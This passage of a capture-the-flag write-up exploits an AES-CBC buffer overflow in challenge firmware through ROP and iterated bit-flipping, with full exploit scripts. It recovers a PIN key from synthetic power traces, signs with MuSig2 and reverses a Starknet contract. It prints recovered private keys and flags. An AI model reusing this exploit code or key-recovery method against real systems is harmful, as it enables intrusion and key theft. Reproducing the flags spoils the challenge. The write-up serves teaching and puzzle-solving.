if (*p_msg_count == 0) {
ret = 0;
else {
i = 0;
while( true ) {
if (*p_msg_count <= i) break;
msg = p_msgs + i;
nonce = paes_nonces + (ulong)i * 0x10;
msg->mode = 0;
ret = do_decrypt(aes_key,nonce,msg->data,msg->size_mode1);
msg->size_mode0 = ret;
rpkt->resp = 1;
i += 1;
ret = 1;
return ret;
Unfortunately, exploiting these two overflow bugs is far more complicated than exploiting a format-string vulnerability.
Exploitation Explorations
In order to exploit the backend server more efficiently, I chose to use the system()
ROP call to execute the command cat <&4 >&5 & cat <&5 >&4; echo 'EOF!EOF!' >&5
. This command creates a simple bidirectional connection between the client socket and the backend socket; after executing this command, we will effectively bypass the frontend entirely and communicate directly with the backend.
Encryption and decryption are done using AES-256 in CBC mode, using 10 random nonces (one per msg
, derived from /dev/urandom
). Charly’s private key is used as the AES key. Both encryption and decryption follow the same structure: the function loops over each message (up to msg_count
) and encrypts or decrypts the message body up to size_mode0
(encrypt) or size_mode1
(decrypt). Neither encryption nor decryption use any padding. After processing a message, the result is sent back in a packet. After processing all messages, the message array is cleared by setting msg_count = 0
and zeroing out all ten msg
s. One particular feature is that the msg_count
immediately follows the ten msg
s in memory, and thus it will be the first thing that is overwritten when overflowing the msg
Unlike the front-end, there is no bug that will allow us to add extra messages. Thus, when exploiting the overflow in encrypt
, we cannot control the content of the data after the ten messages, except to encrypt or decrypt entire blocks (with an unknown key). While we can overwrite the msg_count
during the overflow, it does not help us add more messages, as the count is cleared after all the messages are processed. Furthermore, although we can overwrite msg_count
to cause encrypt
and decrypt
to process more messages, both functions set msg->mode
; on msgs[10]
(the first out-of-bound message), msgs[10].mode
coincides with msg_count
, meaning that both functions will set the low byte of msg_count
to 0 or 1. This will terminate the loop early if msg_count < 256
, and if msg_count >= 256
, the loop will run off the end of the BSS area and crash in unmapped memory. So, we cannot work with any message past msgs[10]
, and in particular, we have no way to leak memory past msgs[10]
Because we do not control the content of msgs[10]
directly, it’s very hard to work with. Thus, we will generally restrict ourselves to using msgs[9]
with a large size parameter to trigger the overflow.
First, it’s helpful to define a few primitive operations that we can perform by using arbitrary AES-CBC operations with an unknown key and nonce. Here’s how AES-CBC works pictorially, courtesy Wikipedia:
For ease of notation, define the following:
- \mathbin\Vert: concatenation
- \oplus: XOR
- 0^{16}: a block of 16 zero bytes
- e(M): the raw encryption operation (with the unknown-but-fixed AES key)
- d(C): the raw decryption operation
- E_{IV}(M): the CBC encryption operation (IV may be omitted if it is unimportant)
- D_{IV}(C): the CBC decryption operation
such that we have E_{IV}(M) = e(IV \oplus M) for a single block M, and similarly D_{IV}(C) = d(C) \oplus IV for a single block C.
We can do the following:
- We can compute d(C) for an arbitrary C by requesting D_{IV}(0^{16} \mathbin\Vert C) and taking the second block, since the second block will be equal to d(C) \oplus 0^{16}.
- We can recover the IV by requesting D_{IV}(0^{16} \mathbin\Vert 0^{16}), since the two zero blocks will be decrypted to the same raw “plaintext”, but the first block will be XORed with IV and the second will be XORed with 0^{16}.
- During decryption, if we control a block X before a known (but uncontrolled) block Y, we can transform Y into a chosen block Z by choosing X = d(Y) \oplus Z; this will cause the second block of D(X \mathbin\Vert Y) to be Z.
- During encryption, if we control everything before a known (but uncontrolled) block Y, we can transform Y into a chosen block Z as follows:
- Obtain Z_p = d(Z).
- Let n be the number of blocks before Y. Choose n blocks X_1, X_2, ..., X_n.
- Request E_{IV}(X_1 \mathbin\Vert X_2 \mathbin\Vert ... \mathbin\Vert X_n), obtaining C_1, C_2, ..., C_n.
- Set C'_n = Y \oplus Z_p and obtain X'_n = d(C'_n) \oplus C_{n-1}. The “plaintext” will be X_1 \mathbin\Vert X_2 \mathbin\Vert ... \mathbin\Vert X_{n-1} \mathbin\Vert X'_n \mathbin\Vert Y; when encrypted, the last block will become Z.
Using (3) and (4), we can reliably control the msg_count
right after msgs[9]
, and also control the size of msgs[10]
We’ll define some helper functions to make this easier (fwexploit_base.py
from exploit2 import *
exploit_system("cat <&4 >&5 & cat <&5 >&4; echo 'EOF!EOF!' >&5")
from typing import Optional
from zlib import crc32
from dataclasses import dataclass
RESPONSE = 0x1336
ADD_MSG = 0x1337
ENCRYPT = 0x1338
DECRYPT = 0x1339
class Message:
mode: int = 0
size_mode0: Optional[int] = None
id: int = 0
data: bytes = b""
crc: Optional[int] = None
size_mode1: Optional[int] = None
def to_bytes(self):
if self.crc is None:
self.crc = crc32(self.data) & 0xffffffff
if self.size_mode0 is None:
self.size_mode0 = len(self.data)
if self.size_mode1 is None:
self.size_mode1 = len(self.data)
return struct.pack("<III256sII",
self.mode, self.size_mode0, self.id, self.data, self.crc, self.size_mode1)
def from_bytes(cls, data):
res = cls(*struct.unpack("<III256sII", data))
res.data = res.data.rstrip(b"\0")
return res
def xor(a, b):
return bytes([ca^cb for ca,cb in zip(a,b)])
def write_pkt(cmd, msg=None, resp=0):
s.send(p32(resp) + p32(cmd) + (msg.to_bytes() if msg else b"\0" * 0x114))
def read_responses(progress=False):
resps = []
while 1:
if progress:
log.info("reading responses... %d", len(resps))
resp = s.recvn(8)
if resp == b"EOF!EOF!":
raise EOFError()
resp, cmd = u32(resp[:4]), u32(resp[4:])
msg = Message.from_bytes(s.recvn(0x114))
if cmd == RESPONSE:
return resp, resps
def add(msg):
write_pkt(ADD_MSG, msg=msg)
def encrypt(n):
for i in range(n):
resp, data = read_responses()
assert resp == 1
resp, data = read_responses()
assert resp == 1
return data
def decrypt(n):
for i in range(n):
resp, data = read_responses()
assert resp == 1
resp, data = read_responses()
assert resp == 1
return data
def decrypt_block(block):
add(Message(mode=1, data=b"\0" * 16 + block))
data = decrypt(1)
return data[-1].data.ljust(32, b"\0")[16:32]
Now that we can control msg_count
, we can progressively increase the size of the overflow in order to corrupt the memory beyond msgs
. We can check the IVs using technique (2) above to see where the IV array is, and we can check to see if our jmpbuf
is still intact by triggering an exception and watching for a crash. By doing this (fwexploit1_memtest.py
), we can infer the following memory layout:
0x16048 msg msgs[10]
0x16b10 uint num_msgs
0x16b14 byte unused[0x114]
0x16c28 byte ivs[16][10]
0x16cc8 exc_info exc
0x16cd8 jmp_buf exc.jmpbuf
0x16d30 uint64_t exc.jmpbuf.x30
0x16d40 uint64_t exc.jmpbuf.sp
Flipping Bits with AES-CBC
Our goal is to gain control over the jmpbuf
. While techniques (3) and (4) are helpful for mutating one known block into another, they aren’t useful for mutating unknown blocks: we cannot leak jmpbuf
as it is too far from msgs
. In any case, we cannot directly control the block preceding the jmpbuf
. We’ll turn to another trick: iterated AES-CBC bit-flipping.
Classic AES-CBC bit-flipping works as follows: if we have an encrypted two-block message E_{IV}(M_1 \mathbin\Vert M_2) = C_1 \mathbin\Vert C_2 and access to the decryption function D, then we can selectively flip bits in M_2 by XORing the desired difference \Delta into C_1: D_{IV}(C_1 \oplus \Delta \mathbin\Vert C_2) = d(C_1 \oplus \Delta) \oplus IV \mathbin\Vert M_2 \oplus \Delta (where M_2 = d(C_2) \oplus C_1). The first block effectively becomes garbage, but the second block is precisely XORed with the desired difference.
The block that we want to bit-flip is the one containing x30
. However, that block is too far away: there are several blocks in between msgs[9]
and jmpbuf.x30
that we do not control.
Because we can call encrypt
and decrypt
in any order, and with any (overflowed) length, we can perform iterated AES-CBC bit-flipping. The basic AES-CBC bit-flip allows us to turn a bit-flip in one block into a bit-flip on the next block. We can bit-flip that first block by bit-flipping the block before it, and so on, until we reach a block that we can manipulate directly. Diagrammatically:
Note that for simplicity, the diagram simply shows a single E function. However, the action of E actually depends on the previous encrypted block (or IV): E(Y_n) = e(Y_n \oplus E(Y_{n-1})).
Bit-Flipping msg_count
Unfortunately, attempting to apply the iterated AES-CBC bit-flipping approach runs into a particular alignment issue: x30
is at 0x16d30, while num_msgs
is at 0x16b10. They are at the same position in each block, so an XOR difference applied to the low 32 bits of x30
has to correspond with an XOR difference in num_msgs
. If we need to flip any bits outside of the low byte of num_msgs
, this implies setting the second byte of num_msgs
, which will make it greater than 255 and crash our program. Unfortunately, all of the one-byte differences applied to x30
(0x1e94 in the binary) result in addresses that are not useful for exploitation, so we will have to use a two-byte difference.
To solve this, I employed a two-stage approach to bit-flip the block after num_msgs
. Instead of overflowing from msgs[9]
, I overflowed from msgs[1]
and msgs[5]
(so chosen because they have the same 16-byte alignment as msgs[9]
). The msgs[1]
overflow bit-flips the num_msgs
block, temporarily increasing msg_count
. The msgs[5]
overflow applies that bit-flip to the block after msg_count
, simultaneously changing msg_count
to be zero and terminating the decryption operation. Diagrammatically:
When decrypting everything from msgs[1]
to the msg_count
, we will “decrypt” all of the intervening blocks, including the size fields for every subsequent message, so the data payloads for msgs[2]
through msgs[5]
must be chosen carefully so that their size fields will still be correct after decryption.
We also have to choose X and Y so that the desired result will appear in the msg_count
block. Let M be the original msg_count
block; then we have:
- Y = d(M) \oplus M \oplus \Delta
- D(Y) = d(Y) \oplus X = d(M \oplus \Delta) \oplus 0^{16}
- X = d(Y) \oplus d(M \oplus \Delta)
Developing this attack was quite complex. Since I could not run firmware.bin
locally, I resorted to constructing an emulator (aes_test.py
) in Python that emulated the operation of encrypt
and decrypt
, but provided me with access to all of the (virtual) memory. The core of the emulator looks like this:
SECRET_AES_KEY = os.urandom(32)
MEMORY = bytearray(0x1000)
MEMORY[0xd30:0xd38] = p64(0xdeadbeeffeed1e94) # x30
MEMORY[0xd40:0xd48] = p64(0xf00fb00bd00d13b0) # sp
MEMORY[0xc28:0xcc8] = os.urandom(16*10) # nonces
def clear():
MEMORY[0x48:0x48 + 0xac8 + 4] = b"\0" * (0xac8 + 4)
def add(m):
n = u32(MEMORY[0xb10:0xb14])
MEMORY[0x48 + n * 0x114:0x48 + (n+1)*0x114] = m.to_bytes()
MEMORY[0xb10:0xb14] = p32(n + 1)
def encrypt(n):
i = 0
results = []
while 1:
n = u32(MEMORY[0xb10:0xb14])
if i >= n: break
base = 0x48 + i * 0x114
m = Message.from_bytes(MEMORY[base: base + 0x114])
iv = MEMORY[0xc28 + i * 0x10: 0xc28 + (i+1) * 0x10]
sz = m.size_mode0
print("...encrypt %d/%d [%d bytes]" % (i, n, sz))
assert base + 0xc + sz <= 0x1000
MEMORY[base + 0xc:base + 0xc + sz] = AES.new(SECRET_AES_KEY, mode=AES.MODE_CBC, iv=iv).encrypt(MEMORY[base + 0xc:base + 0xc + sz])
MEMORY[base + 0x110:base + 0x114] = p32(sz)
MEMORY[base] = 1
i += 1
return results
def decrypt(n):
i = 0
results = []
while 1:
n = u32(MEMORY[0xb10:0xb14])
if i >= n: break
base = 0x48 + i * 0x114
m = Message.from_bytes(MEMORY[base: base + 0x114])
iv = MEMORY[0xc28 + i * 0x10: 0xc28 + (i+1) * 0x10]
sz = m.size_mode1
print("...decrypt %d/%d [%d bytes]" % (i, n, sz))
assert base + 0xc + sz <= 0x1000
MEMORY[base] = 0
MEMORY[base + 0xc:base + 0xc + sz] = AES.new(SECRET_AES_KEY, mode=AES.MODE_CBC, iv=iv).decrypt(MEMORY[base + 0xc:base + 0xc + sz])
MEMORY[base + 4:base + 8] = p32(sz)
i += 1
return results
This enabled me to build an initial exploit which would flip the bits of x30
to cause longjmp
to return elsewhere:
CRC = crc32(b"A" * 16)
def decrypt_msg9(size):
""" Overflowing decryption from message 9. Uses (CRC, size, 10, 0) as the IV for overflowed blocks. """
block_old = struct.pack("<IIII", CRC, size, 10, 0)
block_new = struct.pack("<IIII", 0xaaaaaaaa, 0xbbbbbbbb, 0, 0)
block_dec = decrypt_block(block_old)
block_enc = xor(block_new, block_dec)
for i in range(9):
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=0, data=b"A" * 240 + block_enc, size_mode0=16, size_mode1=size, crc=CRC))
def encrypt_msg9(size, size1):
""" Overflowing encryption from message 9. Uses (CRC, size1, 10, 0) as the IV for overflowed blocks. """
block_old = struct.pack("<IIII", CRC, 16, 10, 0)
block_new = struct.pack("<IIII", CRC, size1, 10, 0)
block_dec = decrypt_block(block_new)
prev_block_enc = xor(block_old, block_dec)
prev_block_dec = decrypt_block(prev_block_enc)
for i in range(9):
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=0, data=b"A" * 256))
data = encrypt(10)
prev_block_pt = xor(data[-1].data[224:240], prev_block_dec)
for i in range(9):
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=1, size_mode0=size, data=b"A" * 240 + prev_block_pt, size_mode1=16, crc=CRC))
def munge_272(diff):
block_old = struct.pack("<IIII", CRC, 16, 10, 0)
block_dec = decrypt_block(block_old)
block_new = struct.pack("<IIII", CRC, 288, diff ^ 10, 0)
block_enc = xor(block_new, block_dec)
b2_old = struct.pack("<IIII", 0, CRC, 16, 0)
b2_dec = decrypt_block(b2_old)
b2_enc = xor(b2_old, b2_dec)
b3_old = struct.pack("<IIII", 0, 0, CRC, 16)
b3_dec = decrypt_block(b3_old)
b3_enc = xor(b3_old, b3_dec)
b4_old = struct.pack("<IIII", 16, 0, 16, 0)
b4_dec = decrypt_block(b4_old)
b4_enc = xor(b4_dec, b4_old)
b5_old = struct.pack("<IIII", CRC, 0x114 * 5 + 12, 0, 16)
b5_dec = decrypt_block(b5_old)
b5_enc = xor(b5_dec, b5_old)
b9_want = struct.pack("<IIII", 0, 0, 0, 0)
b9_dec1 = decrypt_block(block_enc)
b9_dec2 = decrypt_block(block_new)
b9_enc = xor(b9_want, xor(b9_dec1, b9_dec2))
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=0, data=b"A" * 16, size_mode1=0x114 * 9 - 4, crc=CRC))
add(Message(mode=0, data=b"A" * 16 + b"X" * 220 + b2_enc, size_mode0=16, size_mode1=16, crc=CRC))
add(Message(mode=0, data=b"A" * 16 + b"X" * 216 + b3_enc, size_mode0=16, size_mode1=16, crc=CRC))
add(Message(mode=0, data=b"A" * 16 + b"X" * 228 + b4_enc[:12], size_mode0=16, size_mode1=16, crc=CRC))
add(Message(mode=0, data=b"A" * 240 + b5_enc, size_mode0=16, size_mode1=0x114 * 5 + 12, crc=CRC))
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=0, data=b"A" * 16))
add(Message(mode=0, data=b"A" * 16 + b"\0" * 208 + b9_enc + block_enc, size_mode0=16, size_mode1=16, crc=CRC))
cur_x30 = 0x1e94
new_x30 = 0x1b78
SCHEDULE = list(range(816, 272, -16))
for L in tqdm(SCHEDULE):
encrypt_msg9(L, L)
munge_272(new_x30 ^ cur_x30)
for L in tqdm(SCHEDULE[::-1][1:]):
# trigger longjmp
while 1:
a = s.recvn(4, timeout=5)
if not a:
log.info("nothing coming; bailing")
This works! I tried various values of x30
to see if they will produce anything interesting. 0x1b78, for example, is in the middle of the firmware reading code, and will dump out 256 bytes of the stack (fw_leak.bin
). However, there’s nothing interesting there, as the stack frame it prints out is from main
(we get some ASLR leaks, but those are not useful to us as the program crashes immediately afterwards). 0x1218 is in the middle of the password check (right before returning the AES key to the user), but it also does not work since the main
stack frame is missing variables that the password check needs.
So, we will have to modify sp
as well in order to move to a different stack frame. Unfortunately, sp
is in the block right after x30
: if we bit-flip sp
, x30
will become garbage!
Final Exploit
What we actually need to do is execute the bit-flip attack three times: the first time to flip sp
, the second time to un-flip everything before sp
(restoring the “garbage” back to the original values), and the third time to flip x30
. This gets kind of complicated, but luckily it’s easy enough to develop and debug the attack using my emulator (aes_test.py
Note that XORing the stack pointer with a constant bit-flip mask doesn’t necessarily produce a constant stack shift, as the stack pointer is randomized with a granularity of 16 bytes. So, we will have to run the exploit repeatedly and get lucky.
We have to find a suitable target location to jump to, as well as a suitable stack adjustment to apply. ROP is not an option because we do not have any viable ASLR leak (all of our leaks entail crashing the program). We control very little of the stack: the 0x133e check password function (at 0x1150) reads 32 bytes of the input onto the stack with strncpy?
, but this is overwritten by longjmp
In the end, I found a nice solution: the AES decryption routine at 0x1574 places the AES round keys on the stack (creating a large 0x140-byte stack frame), then calls the AES-CBC decryption routine at 0x4480. This CBC decryption routine copies the most recent ciphertext block (which we control) to the stack, giving us 16 bytes of stack control. We can use that 16 bytes to set up a fake stack frame for the firmware reading routine (just enough to put the client fd on the stack), and then use the firmware read at 0x1b78 to dump out the contents of the stack – including the AES round keys. Since the first 16 bytes of the round key structure is the original AES key, this gives us the private key for the win.
Putting it all together, we have the following attack:
- Exploit the front-end and execute
system("cat <&4 >&5 & cat <&5 >&4")
via ROP to connect the client socket directly to the backend. - Use iterated AES-CBC bit-flipping to XOR the stack pointer in the
with 0x1e0, which has a chance of decreasing the stack pointer by 0x1e0. - Invert the bit-flipping of step 2 to restore the value of
which was corrupted in the previous step. - Use iterated AES-CBC bit-flipping to flip the value of
from(exe + 0x1e94) ^ guard
to(exe + 0x1b78) ^ guard
. - Call
with a block containing the client fd (4) to establish a fake stack frame. - Send an invalid packet to throw an exception, calling
. - If everything lines up, stack contents will be printed, including the AES key and round keys.
This exploit is implemented in fwexploit2_real.py
. It takes several tries to land (~5-10, experimentally), but it does eventually dump the stack and the AES key (aes_leak.bin
), from which we can read off the AES key: 04 C6 CB 31 E7 F3 BA 69 4C C0 1F 50 D6 57 3F 8D 22 BE 2E 1B D7 86 1E 17 6D 5B 4E D4 3C 13 F9 F9
. We can use this key to decrypt the stage 2c flag: SSTIC{ba75fa41a81c43c1095588250d45af850cfcec187ae269f2389829224ae6060b}
. Phew!
Stage 2.d
The description for stage 2.d reads:
For the last equipment, Daniel lost his pin code. We tried to extract the information by attacking the secure memory with fault injections but without success 😒. For information, secure memory takes a mask as an argument and uses the stored value XORed with the mask. The measurements we made during the experiment are stored in data.h5. It is too large for backup but you can retrieve it at this address: https://trois-pains-zero.quatre-qu.art/data_34718ec031bbb6e094075a0c7da32bc5056a57ff082c206e6b70fcc864df09e9.h5. Maybe you know someone who could help us find the information?
We’re provided with a single HDF5 file with the following schema:
: 25000×600double
: 25000×32unsigned char
: 25000×4unsigned char
We can infer that the dataset consists of 25000 experimental runs, each of which has a 32-byte mask, 600 leakage measurements, and a 4-byte response. Every response
in the dataset is NACK
>>> all(bytearray(r) == b"NACK" for r in f["response"])
so we can safely ignore that array. Each mask entry just looks like 32 random bytes:
>>> f["mask"][:3]
array([[ 37, 169, 103, 121, 16, 60, 187, 216, 215, 55, 9, 146, 237,
65, 37, 165, 28, 184, 71, 144, 157, 114, 143, 120, 8, 6,
104, 14, 112, 62, 157, 76],
[190, 189, 64, 16, 222, 224, 139, 233, 51, 116, 113, 193, 90,
104, 59, 184, 63, 178, 186, 156, 89, 252, 232, 255, 225, 93,
202, 11, 86, 163, 187, 67],
[ 57, 142, 247, 219, 252, 155, 132, 170, 83, 254, 123, 54, 40,
249, 1, 234, 121, 184, 3, 129, 124, 69, 30, 110, 55, 243,
87, 187, 212, 196, 142, 86]], dtype=uint8)
Finally, we have the leakages. Plotting the first 100 leakages with plot.py
, we see:
This tells us a lot! The signals look like energy usage over time. They are all perfectly aligned, and totally free of noise (gotta love artificial datasets!). In the first part of the signal from about x=50 to x=350 we can see a somewhat random (but highly consistent) signal with one prominent spike, corresponding to the injected “fault”. From about x=350 to x=415, we see either zeros or a very consistent pattern of alternating measurements; then from x=420 to x=480 we see this:
Many of the runs show zero, but those that don’t show a consistent pattern alternating between 0.12 and some value between 0.13 and 0.165. There are exactly 32 peaks in all.
The idea is now clear: the fault injection causes the chip to sometimes perform the intended XOR operation, in which case we see the alternating power draw pattern appear after x=350. The power draw between x=420 and x=480 depends on the result of the XOR calculation.
Here, we can make a guess that the amount of power used will depend on the number of 1 bits set in each byte of the result, where the result is the XOR of the secret key and the mask input. We can therefore recover the key by analyzing the power used for each byte. As the “leakage measurements” are completely artificial and free of any noise, this is fairly straightforward to implement (solve.py
import h5py
from matplotlib import pyplot as plt
f = h5py.File('data_34718ec031bbb6e094075a0c7da32bc5056a57ff082c206e6b70fcc864df09e9.h5', 'r')
hamming = [sum(int(c) for c in f"{i:b}") for i in range(256)]
leakages = f["leakages"]
masks = f["mask"]
key = [None] * 32
for i in range(25000):
mask = masks[i]
# gotta love synthetic data
bits = leakages[i][421:485:2]
if (bits < 0.11).all():
bits = [int(round(c)) for c in ((bits - 0.13) / 0.005)]
for j, b in enumerate(bits):
if key[j] is not None:
assert hamming[key[j] ^ mask[j]] == b
elif b == 0:
key[j] = masks[i][j]
This script simply identifies bytes where the power draw is minimal (equal to 0.13), indicating that zero bits were set in the result, i.e. that the mask byte was equal to the corresponding secret key byte. There are enough runs in the data that this happens at least once in every position. When run, we get D’s private key: 54644250491642f996d1c94a4ac8a8dbec66dd0ba66f0271b4e65d5570026a9b
! We can take this key and decrypt the corresponding stage 2d flag: SSTIC{15fb587e4dc04bbb7abb68fc6651f593d6eb0e4fd84bbfa800c6a66043bda86a}
Stage 3
After obtaining all four private keys, I had to implement the MuSig signature scheme, which was thankfully quite easy because most of the pieces are in the stage2a musig2_player.py
script. The only missing bits are the aggregation calculations of R_j and s, which can be found in the MuSig2 paper. My implementation of the signature scheme is in musig2_sign.py
. Note that it uses a “proper” random nonce, so the result is non-deterministic (though random.randrange
probably isn’t as secure as it could be, so I should use secrets.randbelow
in the future).
When we visit https://trois-pains-zero.quatre-qu.art/ and click on the “Acheter un JNF” (Buy an NFT) link, we get to https://trois-pains-zero.quatre-qu.art/admin/login and are prompted to sign a message that looks like this: We hereby authorize an admin session of 5 minutes starting from 2023-04-02 15:10:41.625883+00:00 (nonce: d70e0896b4b54fb58e10679caa05e157).
Punch in the signature generated by musig2_sign.py
, s=0x395294ce77e7023a70d4a49d27fe3f68d87a89dbf02d229b71abb6e496bcb0f1
) for that message to log in, and we are sent to a second page, https://trois-pains-zero.quatre-qu.art/achat/redeem. Here, we’re asked to enter a coupon in order to buy the NFT.
Validation for the coupon starts in server/achat.py
, which passes the input parameters to a smart contract:
# Handle interaction with Starknet contract
coupon_id = request.form.get("id")
code = request.form.get("code")
a = request.form.get("a")
b = request.form.get("b")
# Abort if data is None or not well formated
coupon_id = int(coupon_id, 16)
code = [int(i, 16) for i in code.split(',')]
a = int(a, 16)
b = int(b, 16)
return go_to_redeem()
if not smart_contract.is_valid(coupon_id, code, a, b):
return go_to_redeem()
The smart contract wrapper just forwards the call to a Starknet contract:
def is_valid(ans: int, code: list[int], a: int, b: int) -> bool:
contract = get_contract()
invocation = contract.functions["validate"].invoke_sync(ans, code, a, b, max_fee=int(1e16))
return True
except Exception as e:
return False
This contract is declared and deployed by server/deploy.py
def declare(contract_path):
owner = config.get_owner_account()
declare_result = Contract.declare_sync(
return declare_result
def deploy(declare_result):
nonce = int.from_bytes(os.urandom(16), "big")
deploy_result = declare_result.deploy_sync(
constructor_args=[config.OWNER_ADDRESS, nonce],
contract = deploy_result.deployed_contract
with open("/tmp/contract_address", "w") as f:
return contract
def run():
declare_result = declare(Path("/app/internal/challenge.json"))
contract = deploy(declare_result)
We don’t have access to the code of the contract (challenge.json
), but server/config.py
provides the necessary configuration to communicate with the blockchain. We see that there is a Starknet RPC gateway at https://blockchain.quatre-qu.art, and that the owner address is 0x4ece2bf9ab3bdb76e689eea5662dc5c07964dc5f00f745972f264df991d8b4d (2227792261936986457068241964193682344855759612155192788502855599627020634957 in decimal). We start by dumping all of the blocks in the blockchain, producing blocks.log
>>> CLIENT.get_block_sync(block_number=0)
>>> CLIENT.get_block_sync(block_number=1)
>>> CLIENT.get_block_sync(block_number=2)
>>> CLIENT.get_block_sync(block_number=3) # errors - not yet present
In Starknet, contracts are instances of “classes” which contain various methods. A contract class is created through a declare transaction, while a contract instance is created through a deploy transaction. Contract classes are identified by their class hash, which can be used to refer to the code of the class stored on the blockchain.
In block 0, we see several declare and deploy transactions which are just setting up the blockchain. In block 1, we see a declare transaction from the owner address, which must be from declare(contract_path)
This suggests that class_hash=850987241191385873857281644945472963972949967069463868452254135667905505665
is our validation contract class. In the very next transaction, we see an invoke transaction:
This invoke transaction will be from deploying the contract. We can see the salt argument (0x1337, or 4919 in decimal), as well as the OWNER_ADDRESS
argument (2227792261936986457068241964193682344855759612155192788502855599627020634957) and what is presumably the nonce argument (121485921437276981477059375547635758552).
Finally, we can dump the contract code via CLIENT.get_class_by_hash_sync("850987241191385873857281644945472963972949967069463868452254135667905505665")
to get program.json
. We can use the open-source Thoth toolkit to disassemble and decompile this code back to something more readable (program.txt
and program.cairo
The disassembly for validate
looks like this:
// Function 23
@external func __main__.validate{syscall_ptr : felt*, pedersen_ptr : starkware.cairo.common.cairo_builtins.HashBuiltin*, range_check_ptr : felt}(id : felt, code_len : felt, code : felt*, a : felt, b : felt)
offset 286: NOP
offset 288: ASSERT_EQ [AP], [FP-10]
offset 288: ADD AP, 1
offset 289: ASSERT_EQ [AP], [FP-9]
offset 289: ADD AP, 1
offset 290: ASSERT_EQ [AP], [FP-8]
offset 290: ADD AP, 1
offset 291: CALL 398 # __main__.assert_only_owner
offset 293: ASSERT_EQ [AP], [FP-7]
offset 293: ADD AP, 1
offset 294: CALL 411 # __main__.assert_only_once
offset 296: ASSERT_EQ [AP], [FP-7]
offset 296: ADD AP, 1
offset 297: ASSERT_EQ [AP], 1 # 0x1
offset 297: ADD AP, 1
offset 299: CALL 116 # __main__.ids.write
offset 301: CALL 164 # __main__.nonce.read
offset 303: ASSERT_EQ [FP], [AP-2]
offset 304: ASSERT_EQ [FP+1], [AP-1]
offset 305: ASSERT_EQ [FP+2], [AP-4]
offset 306: ASSERT_EQ [AP], [AP-3]
offset 306: ADD AP, 1
offset 307: ASSERT_EQ [AP], [FP+1]
offset 307: ADD AP, 1
offset 308: ASSERT_EQ [AP], [FP-6]
offset 308: ADD AP, 1
offset 309: ASSERT_EQ [AP], [FP-5]
offset 309: ADD AP, 1
offset 310: CALL 255 # __main__.first
offset 312: ASSERT_EQ [AP], [FP]
offset 312: ADD AP, 1
offset 313: ASSERT_EQ [AP], [AP-2]
offset 313: ADD AP, 1
offset 314: ASSERT_EQ [AP], [FP-4]
offset 314: ADD AP, 1
offset 315: ASSERT_EQ [AP], [FP-3]
offset 315: ADD AP, 1
offset 316: CALL 274 # __main__.second
offset 318: ASSERT_EQ [AP], [AP-12]
offset 318: ADD AP, 1
offset 319: ASSERT_EQ [AP], [FP+1]
offset 319: ADD AP, 1
offset 320: ASSERT_EQ [AP], [FP-7]
offset 320: ADD AP, 1
offset 321: CALL 0 # starkware.cairo.common.hash.hash2
offset 323: ASSERT_EQ [FP-6], [[AP-8]]
offset 324: ASSERT_EQ [AP], [FP-6] + -3
offset 324: ADD AP, 1
offset 326: ASSERT_EQ [AP-1], [[AP-9]+1]
offset 327: ASSERT_EQ [AP], [FP+2]
offset 327: ADD AP, 1
offset 328: ASSERT_EQ [AP], [AP-4]
offset 328: ADD AP, 1
offset 329: ASSERT_EQ [AP], [AP-11] + 2
offset 329: ADD AP, 1
offset 331: ASSERT_EQ [AP], [AP-5]
offset 331: ADD AP, 1
offset 332: ASSERT_EQ [AP], [FP-5]
offset 332: ADD AP, 1
offset 333: CALL 247 # __main__._validate
offset 335: RET
Reversing the contract
Cairo, the programming language for Starknet contracts, runs on a bit of a “weird” virtual machine. The official tutorial provides a nice introduction to the language and machine. In this VM, there is a single data type called felt
(“field element”), which is an integer modulo some prime. For our contract, that prime is 0x800000000000011000000000000000000000000000000000000000000000001. There are three registers, AP
, FP
and PC
, and an unbounded array of write-once memory cells, each capable of holding a single felt
. The instruction ASSERT_EQ
functions as both an assertion and as an assignment operator: a Cairo program is only accepted if the runtime can prove that some assignment of memory cells passes every ASSERT_EQ
check, so a statement like ASSERT_EQ [AP], [FP-7]
has the effect of setting the memory cell at [AP]
to be equal to [FP-7]
. The AP
register is an “allocation pointer” which indexes the memory and only increments; it functions kind of like a stack pointer for a stack that only pushes and never pops. The FP
register is a frame pointer which points to the current “stack” frame and which is updated on CALL
. The PC
register is the program counter, updated on every instruction executed. CALL
pushes two values: the old FP
and the return PC
. For the most part, you can read ASSERT_EQ [AP], X; ADD AP, 1
as effectively PUSH X
Built-in functions, which provide functionality like hashing and persistent storage, are also handled somewhat unusually. They are handled via a form of memory-mapped I/O, in which a predefined range of memory addresses can be read or written to trigger the functionality. For example, the HashBuiltin
call takes two inputs and produces one output, for a total of three memory addresses. However, since Cairo memory is write-once, instead of using a single block of e.g. three addresses, there are instead a large number of use-once instances – consecutive blocks of memory which can each be used to invoke the function once. This requires maintaining a pointer to the first unused instance, for each built-in function that the program uses: the pointer will be passed to a function that uses it, increments it, and then returns the new value.
I initially started by looking at Thoth’s decompilation, but the code was confusing and hard to understand, and the decompiled code did not make sense in parts. Instead, I dove right in with the disassembly, after lightly cleaning it up and annotating the various PUSH
s with what is being pushed. The code winds up looking like this:
// Function 21
func __main__.first{pedersen_ptr @ [FP-6] : starkware.cairo.common.cairo_builtins.HashBuiltin*}(curr @ [FP-5] : felt, in_len @ [FP-4] : felt, in @ [FP-3] : felt*) -> (res : felt)
offset 255: NOP
offset 257: JNZ 5 # JMP 262
offset 259: PUSH [FP-6] # pedersen_ptr
offset 260: PUSH [FP-5] # curr
offset 261: RET
offset 262: PUSH [FP-6] # pedersen_ptr
offset 263: PUSH [FP-5] # curr
offset 264: PUSH [[FP-3]] # *in
offset 265: CALL 0 # starkware.cairo.common.hash.hash2
offset 267: PUSH [FP-4] + -1 # in_len - 1
offset 269: PUSH [FP-3] + 1 # in + 1
offset 271: CALL 255 # __main__.first
offset 273: RET
Reversing everything to pseudocode, we get something like this:
func first(curr: felt, in_len: felt, in: felt*) -> (res: felt) {
if (in_len == 0) {
return curr;
result = hash2(curr, *in);
return first(result, in_len - 1, in + 1);
func second(h: felt, a: felt, b: felt) {
range_check(0x1000000000000000000000000000 - a);
assert(h == a * 0x100000000000000000000000000000000 + b);
func _validate(id_hash: felt, code: felt*) {
j(id_hash, code);
func validate(id: felt, code_len: felt, code: felt*, a: felt, b: felt) {
